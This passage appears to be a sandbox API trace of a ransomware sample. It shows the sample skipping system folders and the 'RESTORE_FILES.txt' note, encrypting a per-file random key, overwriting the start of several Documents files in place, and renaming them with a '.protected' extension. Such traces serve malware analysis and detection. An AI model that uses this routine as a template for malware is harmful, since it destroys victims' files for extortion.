wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.526] StrStrIW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".protected") returned 0x0 [0091.526] lstrcmpW (lpString1="Owxukk3Ya-fHVmLDY.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.526] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.526] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owxukk3ya-fhvmldy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.526] StrStrW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".txt") returned 0x0 [0091.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.526] StrStrW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".rar") returned 0x0 [0091.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx") returned 66 [0091.527] StrStrW (lpFirst="Owxukk3Ya-fHVmLDY.docx", lpSrch=".zip") returned 0x0 [0091.527] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.527] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.527] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.528] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.528] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.528] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.528] CloseHandle (hObject=0xb4) returned 1 [0091.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx.protected") returned 76 [0091.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owxukk3ya-fhvmldy.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Owxukk3Ya-fHVmLDY.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owxukk3ya-fhvmldy.docx.protected")) returned 1 [0091.532] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="Windows") returned -1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="Program Files") returned -1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="Program Files (x86)") returned -1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="$Recycle.bin") returned 1 [0091.532] lstrcmpiW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="System Volume Information") returned -1 [0091.532] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.532] StrStrIW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".protected") returned 0x0 [0091.532] lstrcmpW (lpString1="PKgBfBp5qjgkCtrf.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.532] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pkgbfbp5qjgkctrf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.535] StrStrW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".txt") returned 0x0 [0091.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.535] StrStrW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".rar") returned 0x0 [0091.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx") returned 65 [0091.535] StrStrW (lpFirst="PKgBfBp5qjgkCtrf.pptx", lpSrch=".zip") returned 0x0 [0091.535] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.536] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.536] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.536] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.536] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.536] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.536] CloseHandle (hObject=0xb4) returned 1 [0091.537] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx.protected") returned 75 [0091.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pkgbfbp5qjgkctrf.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PKgBfBp5qjgkCtrf.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pkgbfbp5qjgkctrf.pptx.protected")) returned 1 [0091.590] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="Windows") returned -1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="Program Files") returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="Program Files (x86)") returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="$Recycle.bin") returned 1 [0091.590] lstrcmpiW (lpString1="puNsgA3G.docx", lpString2="System Volume Information") returned -1 [0091.590] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.590] StrStrIW (lpFirst="puNsgA3G.docx", lpSrch=".protected") returned 0x0 [0091.590] lstrcmpW (lpString1="puNsgA3G.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\punsga3g.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.591] StrStrW (lpFirst="puNsgA3G.docx", lpSrch=".txt") returned 0x0 [0091.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.591] StrStrW (lpFirst="puNsgA3G.docx", lpSrch=".rar") returned 0x0 [0091.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx") returned 57 [0091.591] StrStrW (lpFirst="puNsgA3G.docx", lpSrch=".zip") returned 0x0 [0091.591] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.592] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.592] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.592] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.592] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.592] CloseHandle (hObject=0xb4) returned 1 [0091.592] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx.protected") returned 67 [0091.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\punsga3g.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\puNsgA3G.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\punsga3g.docx.protected")) returned 1 [0091.597] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="Windows") returned -1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="Program Files") returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="Program Files (x86)") returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="$Recycle.bin") returned 1 [0091.597] lstrcmpiW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="System Volume Information") returned -1 [0091.597] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.597] StrStrIW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".protected") returned 0x0 [0091.597] lstrcmpW (lpString1="PVLpLKRdu1m f1.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.598] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.598] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvlplkrdu1m f1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.598] StrStrW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".txt") returned 0x0 [0091.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.598] StrStrW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".rar") returned 0x0 [0091.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx") returned 63 [0091.598] StrStrW (lpFirst="PVLpLKRdu1m f1.xlsx", lpSrch=".zip") returned 0x0 [0091.598] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.599] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.599] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.599] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.600] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.600] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.600] CloseHandle (hObject=0xb4) returned 1 [0091.600] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx.protected") returned 73 [0091.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvlplkrdu1m f1.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PVLpLKRdu1m f1.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvlplkrdu1m f1.xlsx.protected")) returned 1 [0091.601] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="Windows") returned -1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="Program Files") returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="Program Files (x86)") returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="$Recycle.bin") returned 1 [0091.601] lstrcmpiW (lpString1="QbonyhsO.rtf", lpString2="System Volume Information") returned -1 [0091.601] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.601] StrStrIW (lpFirst="QbonyhsO.rtf", lpSrch=".protected") returned 0x0 [0091.601] lstrcmpW (lpString1="QbonyhsO.rtf", lpString2="RESTORE_FILES.txt") returned -1 [0091.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbonyhso.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.602] StrStrW (lpFirst="QbonyhsO.rtf", lpSrch=".txt") returned 0x0 [0091.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.602] StrStrW (lpFirst="QbonyhsO.rtf", lpSrch=".rar") returned 0x0 [0091.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf") returned 56 [0091.602] StrStrW (lpFirst="QbonyhsO.rtf", lpSrch=".zip") returned 0x0 [0091.602] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.603] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.603] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.603] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.603] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.603] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.603] CloseHandle (hObject=0xb4) returned 1 [0091.603] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf.protected") returned 66 [0091.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbonyhso.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QbonyhsO.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbonyhso.rtf.protected")) returned 1 [0091.605] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.605] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="Windows") returned -1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="Program Files") returned 1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="Program Files (x86)") returned 1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="$Recycle.bin") returned 1 [0091.606] lstrcmpiW (lpString1="qoqSsP_XOts8.xlsx", lpString2="System Volume Information") returned -1 [0091.606] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.606] StrStrIW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".protected") returned 0x0 [0091.606] lstrcmpW (lpString1="qoqSsP_XOts8.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.606] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.606] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qoqssp_xots8.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.606] StrStrW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".txt") returned 0x0 [0091.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.606] StrStrW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".rar") returned 0x0 [0091.607] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx") returned 61 [0091.607] StrStrW (lpFirst="qoqSsP_XOts8.xlsx", lpSrch=".zip") returned 0x0 [0091.607] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.607] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.607] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.608] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.608] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.608] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.608] CloseHandle (hObject=0xb4) returned 1 [0091.608] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx.protected") returned 71 [0091.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qoqssp_xots8.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js 